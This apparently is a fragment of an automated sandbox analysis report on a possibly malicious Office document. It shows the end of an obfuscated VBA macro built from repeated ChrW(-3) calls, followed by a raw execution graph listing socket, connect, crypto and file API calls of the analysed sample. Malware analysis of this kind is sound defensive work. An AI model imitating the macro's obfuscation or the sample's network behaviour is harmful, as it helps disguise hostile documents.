3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3)

                              ChrW

                              101

                              . InsertAfter Text := ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3)

                              ChrW

                              113

                              . InsertParagraphAfter

                              114

                              End With

                              115

                              End Sub

                              Reset < >

                                Execution Graph

                                Execution Coverage:4.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:2.9%
                                Total number of Nodes:1716
                                Total number of Limit Nodes:43
                                execution_graph 41457 877bff 197 API calls 42977 89d08b 95 API calls 42979 866493 strtod 42980 882490 27 API calls 43124 86f29f 68 API calls 43125 896a90 139 API calls 43126 899a90 28 API calls 43130 89cea1 48 API calls 42984 8970a0 52 API calls 42985 86544b 32 API calls _ValidateLocalCookies 43131 8a5aa0 160 API calls _ValidateLocalCookies 43132 8acaa0 11 API calls ___from_strstr_to_strchr 42986 86bcad 73 API calls _ValidateLocalCookies 42987 869caa 31 API calls _ValidateLocalCookies 43134 86544b 24 API calls _ValidateLocalCookies 43135 862aa8 21 API calls ___from_strstr_to_strchr 43136 8a3ea4 71 API calls _ValidateLocalCookies 42989 86544b 22 API calls _ValidateLocalCookies 43138 898ab0 113 API calls 43139 8916b0 24 API calls 43140 87aa5b 17 API calls 43141 8886b7 10 API calls 42991 8700c4 29 API calls _ValidateLocalCookies 43142 87bec2 76 API calls 41953 877ccf 41976 877b5d 41953->41976 41958 877d18 41960 877d31 41958->41960 41998 87941d 19 API calls 2 library calls 41958->41998 41985 885d7a 41960->41985 41961 877bff 41967 890211 20 API calls 41961->41967 41969 8795e3 19 API calls 41961->41969 41972 8789ca 41961->41972 41975 882166 82 API calls 41961->41975 41996 877961 102 API calls 41961->41996 42000 889e52 18 API calls 41961->42000 41964 877d4f 41964->41961 41999 877961 102 API calls 41964->41999 41967->41961 41968 87d632 17 API calls 41970 877d92 41968->41970 41969->41961 41973 8795e3 19 API calls 41970->41973 41973->41964 41975->41961 41977 877b8e 41976->41977 41978 877b69 malloc 41976->41978 41977->41964 41980 88f716 41977->41980 41978->41977 41981 89480b 2 API calls 41980->41981 41984 88f738 41981->41984 41982 8b0ca6 _ValidateLocalCookies 5 API calls 41983 877cf7 41982->41983 41983->41958 41997 87941d 19 API calls 2 library calls 41983->41997 41984->41982 42001 8839d0 41985->42001 41987 885d8e 42007 8854c5 41987->42007 41991 885df4 41992 877405 18 API calls 41991->41992 41995 877d41 41991->41995 41993 885e0e 41992->41993 41994 882166 82 API calls 41993->41994 41994->41995 41995->41964 41995->41968 41996->41961 41997->41958 41998->41960 41999->41961 42000->41961 42002 8839e8 free 42001->42002 42003 883a06 free 42002->42003 42004 883a1a 42003->42004 42005 883a22 42003->42005 42106 8816ca 266 API calls 42004->42106 42005->41987 42008 8854e7 42007->42008 42009 885510 42008->42009 42010 885517 42008->42010 42009->41991 42009->41995 42088 885c82 42009->42088 42107 882ebe 9 API calls 42010->42107 42012 88551e 42013 885524 42012->42013 42108 8833bc 129 API calls 42012->42108 42013->42009 42016 885536 42016->42009 42016->42013 42109 8840dc 132 API calls 42016->42109 42017 8855cb 42017->42009 42110 884683 93 API calls _ValidateLocalCookies 42017->42110 42019 8855fa 42019->42009 42111 8846f5 118 API calls 42019->42111 42021 88560d 42021->42009 42112 884d9e 23 API calls 42021->42112 42023 885639 42023->42009 42113 882e9b 17 API calls 42023->42113 42025 88564e 42025->42009 42026 88566a 42025->42026 42114 882e9b 17 API calls 42025->42114 42026->42009 42028 88568a 42026->42028 42115 882e9b 17 API calls 42026->42115 42028->42009 42031 8856aa 42028->42031 42116 882e9b 17 API calls 42028->42116 42031->42009 42032 88580b 42031->42032 42041 885768 42031->42041 42121 886afb malloc 42032->42121 42034 8859cc 42034->42013 42122 886afb malloc 42034->42122 42036 8859e5 42036->42013 42123 8824b5 84 API calls _ValidateLocalCookies 42036->42123 42038 8857fa 42120 885e2f malloc QueryPerformanceCounter GetTickCount 42038->42120 42039 8859f4 42042 885ac6 42039->42042 42124 8825b8 91 API calls 42039->42124 42041->42038 42117 8890d7 18 API calls _ValidateLocalCookies 42041->42117 42075 885b58 42042->42075 42126 889064 14 API calls _ValidateLocalCookies 42042->42126 42045 8857ad 42045->42009 42118 8838dc free 42045->42118 42046 885a2c 42046->42042 42047 885a37 42046->42047 42125 885106 64 API calls _ValidateLocalCookies 42047->42125 42050 87d632 17 API calls 42051 885b66 42050->42051 42128 881ef9 36 API calls 42051->42128 42053 8857be 42053->42013 42119 88c80b 19 API calls 42053->42119 42055 885a43 free 42063 885a6a free 42055->42063 42057 885b49 42061 885bbb 42057->42061 42129 88949f 7 API calls _ValidateLocalCookies 42057->42129 42058 885b0a 42058->42057 42127 8893e2 7 API calls _ValidateLocalCookies 42058->42127 42130 8890d7 18 API calls _ValidateLocalCookies 42061->42130 42062 885b24 42066 885b4c 42062->42066 42067 885b3e 42062->42067 42065 885a7e 42063->42065 42069 87d632 17 API calls 42065->42069 42071 87d632 17 API calls 42066->42071 42070 882166 82 API calls 42067->42070 42073 885abe 42069->42073 42070->42057 42071->42075 42072 885ba8 42076 885c70 42072->42076 42077 885bb0 42072->42077 42131 885e2f malloc QueryPerformanceCounter GetTickCount 42073->42131 42074 885bee 42074->42073 42084 87d632 17 API calls 42074->42084 42075->42050 42080 87d632 17 API calls 42076->42080 42078 882166 82 API calls 42077->42078 42078->42061 42079 885bcc 42079->42009 42079->42074 42082 87d632 17 API calls 42079->42082 42080->42075 42082->42074 42083 885c33 42132 8838dc free 42083->42132 42084->42073 42086 885c3a 42086->42009 42133 884e84 410 API calls 42086->42133 42089 88f716 7 API calls 42088->42089 42090 885ca6 42089->42090 42091 89480b 2 API calls 42090->42091 42093 885cb3 42090->42093 42092 885cce 42091->42092 42094 885ce9 42092->42094 42095 885d04 42092->42095 42093->41991 42134 87f1ba 42094->42134 42097 88f716 7 API calls 42095->42097 42099 885d15 42097->42099 42098 885cfd 42098->42093 42101 89480b 2 API calls 42098->42101 42100 88f716 7 API calls 42099->42100 42102 885d39 42099->42102 42100->42102 42101->42093 42144 87e64d 42102->42144 42106->42005 42107->42012 42108->42016 42109->42017 42110->42019 42111->42021 42112->42023 42113->42025 42114->42026 42115->42028 42116->42031 42117->42045 42118->42053 42119->42038 42120->42013 42121->42034 42122->42036 42123->42039 42124->42046 42125->42055 42126->42058 42127->42062 42128->42013 42129->42072 42130->42079 42131->42083 42132->42086 42133->42013 42153 87dd6c 42134->42153 42137 87f1ed 42204 87d6ad 17 API calls _ValidateLocalCookies 42137->42204 42139 87f1fa 42139->42098 42140 87f34a 42140->42139 42205 87941d 19 API calls 2 library calls 42140->42205 42143 87f204 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 42143->42140 42159 87ee55 42143->42159 42145 87e678 42144->42145 42147 87e6b8 42145->42147 42151 87e6a5 42145->42151 42290 87e49e 29 API calls _ValidateLocalCookies 42145->42290 42148 8b0ca6 _ValidateLocalCookies 5 API calls 42147->42148 42150 87e6d9 42148->42150 42152 882e23 17 API calls 42150->42152 42276 87e574 42151->42276 42152->42098 42154 87dda3 42153->42154 42155 87ddf6 42154->42155 42156 89480b 2 API calls 42154->42156 42157 8b0ca6 _ValidateLocalCookies 5 API calls 42155->42157 42156->42155 42158 87dedd 42157->42158 42158->42137 42158->42143 42206 87f472 42159->42206 42162 87f054 42164 8b0ca6 _ValidateLocalCookies 5 API calls 42162->42164 42166 87f1b8 42164->42166 42166->42143 42167 87eede 42247 87a0b8 23 API calls _strrchr 42167->42247 42168 87ef19 42169 87d632 17 API calls 42168->42169 42172 87ef2e 42169->42172 42170 87ef6b 42230 87edc5 42170->42230 42172->42170 42222 87ed5e setsockopt 42172->42222 42174 87eefc 42248 87d6ad 17 API calls _ValidateLocalCookies 42174->42248 42178 87ef0b 42182 87f3fc 2 API calls 42178->42182 42179 87efda 42180 87eff9 42179->42180 42183 87f060 ioctlsocket 42179->42183 42249 87dedf 424 API calls _ValidateLocalCookies 42180->42249 42182->42162 42185 89480b 2 API calls 42183->42185 42187 87f08e 42185->42187 42186 87f009 42186->42183 42188 87f017 42186->42188 42189 87f0d6 42187->42189 42258 87941d 19 API calls 2 library calls 42187->42258 42250 87f3fc 42188->42250 42189->42162 42196 87f0ff connect 42189->42196 42197 87f128 WSAGetLastError 42189->42197 42192 87f026 42192->42162 42193 87ef9c 42193->42178 42193->42179 42194 87f0c0 42259 87941d 19 API calls 2 library calls 42194->42259 42196->42162 42196->42197 42197->42162 42198 87f13b 42197->42198 42198->42162 42260 87a0b8 23 API calls _strrchr 42198->42260 42200 87f156 42201 87d632 17 API calls 42200->42201 42202 87f167 42201->42202 42203 87f3fc 2 API calls 42202->42203 42203->42162 42204->42139 42205->42139 42207 87f4bc 42206->42207 42208 87f528 socket 42207->42208 42213 87f4f6 42207->42213 42208->42213 42209 87f54e ioctlsocket 42210 87f53d 42209->42210 42211 8b0ca6 _ValidateLocalCookies 5 API calls 42210->42211 42212 87eeac 42211->42212 42212->42162 42214 87e407 42212->42214 42213->42209 42213->42210 42215 87e416 42214->42215 42216 87e46f 42214->42216 42217 87e456 42215->42217 42261 889bff 14 API calls 42215->42261 42216->42217 42262 87201d 14 API calls 42216->42262 42217->42167 42217->42168 42220 87e431 42220->42217 42221 87e437 htons 42220->42221 42221->42217 42223 87ed94 WSAGetLastError 42222->42223 42224 87edb5 42222->42224 42263 87a0b8 23 API calls _strrchr 42223->42263 42225 8b0ca6 _ValidateLocalCookies 5 API calls 42224->42225 42228 87edc3 42225->42228 42227 87eda8 42229 87d632 17 API calls 42227->42229 42228->42170 42229->42224 42231 87edea 42230->42231 42237 87edf8 42230->42237 42264 870b38 42231->42264 42233 87ee18 getsockopt 42234 87ee36 42233->42234 42235 87ee3e setsockopt 42233->42235 42234->42235 42236 87edff 42234->42236 42235->42236 42236->42193 42238 87dcb0 setsockopt 42236->42238 42237->42233 42237->42236 42239 87dcfd WSAIoctl 42238->42239 42240 87dcec 42238->42240 42242 87dd48 WSAGetLastError 42239->42242 42243 87dcf8 42239->42243 42241 87d632 17 API calls 42240->42241 42241->42243 42244 87d632 17 API calls 42242->42244 42245 8b0ca6 _ValidateLocalCookies 5 API calls 42243->42245 42244->42243 42246 87dd6a 42245->42246 42246->42193 42247->42174 42248->42178 42249->42186 42251 87f432 closesocket 42250->42251 42253 87f40d 42250->42253 42257 87f43b 42251->42257 42252 87f440 42275 878f25 free 42252->42275 42253->42252 42255 87f424 42253->42255 42274 878f25 free 42255->42274 42257->42192 42258->42194 42259->42189 42260->42200 42261->42220 42262->42217 42263->42227 42265 870b63 GetModuleHandleA GetProcAddress 42264->42265 42266 870b85 42264->42266 42265->42266 42267 870be2 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 42266->42267 42268 870ba0 42266->42268 42269 870c56 RtlVerifyVersionInfo 42267->42269 42270 870c68 VerifyVersionInfoW 42267->42270 42271 8b0ca6 _ValidateLocalCookies 5 API calls 42268->42271 42269->42268 42270->42268 42273 870c84 42271->42273 42273->42237 42274->42251 42275->42257 42291 8b20c0 42276->42291 42279 87e5f0 42282 87e407 15 API calls 42279->42282 42280 87e5d0 WSAGetLastError 42293 87a0b8 23 API calls _strrchr 42280->42293 42287 87e608 42282->42287 42283 87e63b 42285 8b0ca6 _ValidateLocalCookies 5 API calls 42283->42285 42286 87e64b 42285->42286 42286->42147 42287->42283 42294 87a0b8 23 API calls _strrchr 42287->42294 42289 87e5e6 42295 87d6ad 17 API calls _ValidateLocalCookies 42289->42295 42290->42151 42292 87e5b4 getsockname 42291->42292 42292->42279 42292->42280 42293->42289 42294->42289 42295->42283 42993 8a30c0 48 API calls ___from_strstr_to_strchr 43144 86aacc 74 API calls _ValidateLocalCookies 43148 87aa59 __acrt_iob_func 42998 8a04d0 free _close 43150 8b16d0 14 API calls 43001 8998e0 149 API calls 43002 8914e0 245 API calls 43003 8abce7 36 API calls _ValidateLocalCookies 43006 895cf0 6 API calls _ValidateLocalCookies 43157 895ef0 42 API calls 43011 8abc02 43 API calls _ValidateLocalCookies 43161 89d200 97 API calls 43162 896e00 43 API calls 43012 8a2400 67 API calls 43013 8a6400 CryptAcquireContextA CryptGenRandom CryptReleaseContext 42715 861e09 42716 861e29 42715->42716 42717 872677 3 API calls 42716->42717 42718 861e49 42717->42718 42719 861e93 42718->42719 42720 861e4f strtol 42718->42720 42721 861e9b GetStdHandle 42719->42721 42722 861eb7 42719->42722 42727 861e66 42720->42727 42721->42722 42723 861ea8 GetConsoleScreenBufferInfo 42721->42723 42725 8b0ca6 _ValidateLocalCookies 5 API calls 42722->42725 42723->42722 42724 872920 free 42724->42719 42726 861f0b 42725->42726 42727->42724 43165 897210 calloc calloc 43018 89d013 78 API calls 42879 878819 42880 878826 42879->42880 42884 878842 42879->42884 42881 878837 42880->42881 42882 8795e3 19 API calls 42880->42882 42883 876f2d 102 API calls 42881->42883 42882->42881 42883->42884 42885 877bff 42884->42885 42894 877961 102 API calls 42884->42894 42886 8795e3 19 API calls 42885->42886 42888 890211 20 API calls 42885->42888 42890 8789ca 42885->42890 42892 882166 82 API calls 42885->42892 42893 877961 102 API calls 42885->42893 42895 889e52 18 API calls 42885->42895 42886->42885 42888->42885 42892->42885 42893->42885 42894->42885 42895->42885 43166 86a227 266 API calls 43167 88db05 298 API calls _ValidateLocalCookies 43019 873020 fopen fseek 43020 887c20 GetEnvironmentVariableA realloc free free 43168 888a20 31 API calls _ValidateLocalCookies 43021 898420 free free free 43024 89d022 474 API calls 43025 87aa5b 11 API calls 43172 8a1e30 144 API calls 41862 86ce40 _strdup 41863 86ce52 setlocale 41862->41863 41864 86ce69 41863->41864 41868 86ce82 41863->41868 41865 86ce6d strncmp 41864->41865 41874 86cecb 41864->41874 41865->41868 41869 86cebf free 41865->41869 41868->41869 41885 86dc15 41868->41885 41871 86cec7 41869->41871 41870 86ceda 41875 86cee6 41870->41875 41876 86cef5 41870->41876 41873 86ceee 41871->41873 41871->41874 41914 868599 28 API calls 41874->41914 41915 8689a1 19 API calls 41875->41915 41876->41873 41880 86cf06 41876->41880 41881 86ceff 41876->41881 41879 86ceb6 41879->41869 41879->41871 41883 86cf04 41880->41883 41917 868b82 319 API calls 41880->41917 41916 868a54 18 API calls _ValidateLocalCookies 41881->41916 41883->41873 41886 86dcb0 41885->41886 41887 86dc3f 41885->41887 41888 86dcc6 fopen 41886->41888 41891 86dcbd __acrt_iob_func 41886->41891 41918 86375a 41887->41918 41912 86dc7a 41888->41912 41891->41912 41892 86e06b free 41898 86ce9b 41892->41898 41893 86dc57 fopen 41895 86dc6b free 41893->41895 41893->41912 41894 86dc81 41932 86db81 16 API calls _strrchr 41894->41932 41895->41898 41898->41879 41913 869159 15 API calls 41898->41913 41900 86dc8b 41910 86dc9e 41900->41910 41933 86db81 16 API calls _strrchr 41900->41933 41901 86e047 41931 870c88 free 41901->41931 41904 86e056 __acrt_iob_func 41904->41892 41905 86e063 fclose 41904->41905 41905->41892 41906 86de14 malloc 41906->41901 41906->41910 41908 86e02b free 41908->41912 41909 86df79 malloc 41909->41910 41910->41892 41910->41912 41911 86913e 20 API calls 41911->41912 41912->41892 41912->41901 41912->41906 41912->41908 41912->41909 41912->41911 41924 86e08f 41912->41924 41934 8652d9 21 API calls _ValidateLocalCookies 41912->41934 41913->41879 41914->41870 41915->41873 41916->41883 41917->41883 41919 863846 41918->41919 41923 863775 41918->41923 41919->41893 41919->41894 41922 872920 free 41922->41923 41923->41919 41923->41922 41935 872677 41923->41935 41942 8636ba 41923->41942 41926 86e09c ___from_strstr_to_strchr 41924->41926 41925 86e0b3 fgets 41925->41926 41930 86e106 41925->41930 41926->41925 41926->41930 41952 870ca0 free realloc free 41926->41952 41927 8b0ca6 _ValidateLocalCookies 5 API calls 41928 86e125 41927->41928 41928->41912 41930->41927 41931->41904 41932->41900 41933->41910 41934->41912 41939 8726a4 41935->41939 41936 8726c4 realloc 41937 87268e GetEnvironmentVariableA 41936->41937 41938 8726ce free 41936->41938 41937->41938 41937->41939 41941 8726e4 41938->41941 41939->41936 41939->41938 41939->41941 41941->41923 41945 8636dc 41942->41945 41944 86374e 41944->41923 41945->41944 41946 863737 _strdup _close 41945->41946 41947 872920 free 41945->41947 41949 870b16 _open 41945->41949 41950 872920 41946->41950 41947->41945 41949->41945 41951 872935 free 41950->41951 41951->41944 41952->41926 43029 872040 free realloc free 42645 877bff 102 API calls 43031 8a2440 53 API calls 43174 8b1e40 6 API calls 4 library calls 43176 86544b 25 API calls _ValidateLocalCookies 43036 897050 64 API calls 43178 898a50 105 API calls 43037 86d05c 314 API calls _strrchr 43039 86544b 22 API calls _ValidateLocalCookies 41460 878063 41461 878032 41460->41461 41461->41460 41463 876f2d 102 API calls 41461->41463 41464 8780dc 41461->41464 41535 87d6ad 17 API calls _ValidateLocalCookies 41461->41535 41463->41461 41467 878130 41464->41467 41486 892f70 41464->41486 41465 878143 41470 876f2d 102 API calls 41465->41470 41473 877ebc 41465->41473 41466 8781a1 41466->41473 41536 88c6a7 19 API calls 41466->41536 41467->41465 41467->41466 41469 8781c5 41471 876f2d 102 API calls 41469->41471 41470->41473 41472 8781e0 41471->41472 41478 8781f0 41472->41478 41537 88c1fd 108 API calls 41472->41537 41483 877bff 41473->41483 41538 877961 102 API calls 41473->41538 41476 890211 20 API calls 41476->41483 41477 878237 free 41477->41473 41478->41477 41479 8795e3 19 API calls 41479->41483 41481 8789ca 41483->41476 41483->41479 41483->41481 41484 882166 82 API calls 41483->41484 41534 877961 102 API calls 41483->41534 41539 889e52 18 API calls 41483->41539 41484->41483 41487 892f97 41486->41487 41533 892fa9 41487->41533 41540 891c9a 41487->41540 41489 892fcb 41490 892ffa free 41489->41490 41491 893004 41489->41491 41489->41533 41490->41491 41491->41533 41555 890ca5 41491->41555 41495 893084 free 41499 8930ac 41495->41499 41497 893133 free 41502 89311f 41497->41502 41498 8930f1 free 41498->41502 41499->41497 41499->41498 41499->41533 41502->41533 41561 89206c 41502->41561 41504 893163 41504->41533 41575 892ca5 41504->41575 41508 8931ad 41508->41533 41592 87d26d 41508->41592 41511 8933eb 41738 87d126 free 41511->41738 41514 893220 41514->41511 41515 87d26d 15 API calls 41514->41515 41516 89336b free 41515->41516 41518 8933a4 free 41516->41518 41519 8933be free 41518->41519 41519->41511 41520 8933cd 41519->41520 41520->41511 41625 892995 41520->41625 41526 893434 41526->41511 41661 892295 41526->41661 41529 890211 20 API calls 41531 8934d7 41529->41531 41530 89347a 41530->41529 41530->41533 41532 87d632 17 API calls 41531->41532 41531->41533 41532->41533 41533->41467 41534->41483 41535->41461 41536->41469 41537->41478 41538->41483 41539->41483 41541 891cae free 41540->41541 41545 891cd6 41540->41545 41541->41545 41543 891d16 free 41544 891d2e 41543->41544 41546 891d5b 41544->41546 41549 891dfa 41544->41549 41545->41543 41545->41549 41739 89044e malloc ___from_strstr_to_strchr 41546->41739 41548 891d62 41548->41549 41550 891d72 free 41548->41550 41552 891d85 ___from_strstr_to_strchr 41548->41552 41549->41489 41553 891dd9 41550->41553 41554 891dd1 free 41552->41554 41553->41549 41554->41553 41556 890ccd 41555->41556 41558 890d34 41556->41558 41560 890ce5 free 41556->41560 41740 890af6 156 API calls 41556->41740 41558->41560 41741 890af6 156 API calls 41558->41741 41560->41495 41560->41533 41562 8920a7 41561->41562 41567 892093 41561->41567 41742 8737e5 free free free free free 41562->41742 41569 8921c7 41567->41569 41570 89213e 41567->41570 41574 892098 41567->41574 41743 870e10 free free 41567->41743 41569->41504 41744 873fae 23 API calls 41570->41744 41571 89215b 41571->41574 41745 870e10 free free 41571->41745 41574->41569 41746 87d6ad 17 API calls _ValidateLocalCookies 41574->41746 41577 892cb8 41575->41577 41576 892cdc 41576->41533 41585 892b7a 41576->41585 41577->41576 41578 892d52 41577->41578 41580 892d64 41577->41580 41583 892df2 41577->41583 41747 87d6ad 17 API calls _ValidateLocalCookies 41578->41747 41581 892e4e 41580->41581 41580->41583 41749 87d6ad 17 API calls _ValidateLocalCookies 41581->41749 41583->41576 41748 87d6ad 17 API calls _ValidateLocalCookies 41583->41748 41586 892b8a 41585->41586 41591 892bcb 41585->41591 41587 892ba4 free 41586->41587 41588 892bd9 41586->41588 41587->41591 41590 892c0a free 41588->41590 41588->41591 41590->41591 41591->41508 41750 87d231 41592->41750 41594 87d27f 41594->41511 41595 891eb9 41594->41595 41596 89203e 41595->41596 41597 891ef1 41595->41597 41766 87d217 free realloc free 41596->41766 41597->41596 41599 891efe 41597->41599 41757 875da0 15 API calls 41599->41757 41601 891f09 41603 891f2d 41601->41603 41610 891f0f 41601->41610 41758 87649e 93 API calls 41601->41758 41602 892060 41602->41514 41608 891f33 41603->41608 41760 87649e 93 API calls 41603->41760 41604 892048 41604->41602 41606 87d26d 15 API calls 41604->41606 41606->41602 41759 875d80 13 API calls 41608->41759 41610->41602 41611 891f4a 41611->41608 41612 891f82 41611->41612 41761 87649e 93 API calls 41611->41761 41612->41608 41763 875f16 24 API calls _ValidateLocalCookies 41612->41763 41615 891f70 41615->41608 41762 87649e 93 API calls 41615->41762 41616 891f97 41616->41608 41617 891f9d 41616->41617 41764 875d80 13 API calls 41617->41764 41620 891fa4 41765 87d217 free realloc free 41620->41765 41622 891fba free 41622->41602 41624 891fd8 41622->41624 41624->41602 41624->41604 41635 8929b5 41625->41635 41626 892b4a 41626->41511 41641 891b0a 41626->41641 41627 892b2d 41627->41626 41632 87d14a 3 API calls 41627->41632 41628 892aea 41628->41627 41629 892b08 41628->41629 41630 87d14a 3 API calls 41628->41630 41629->41626 41631 87d26d 15 API 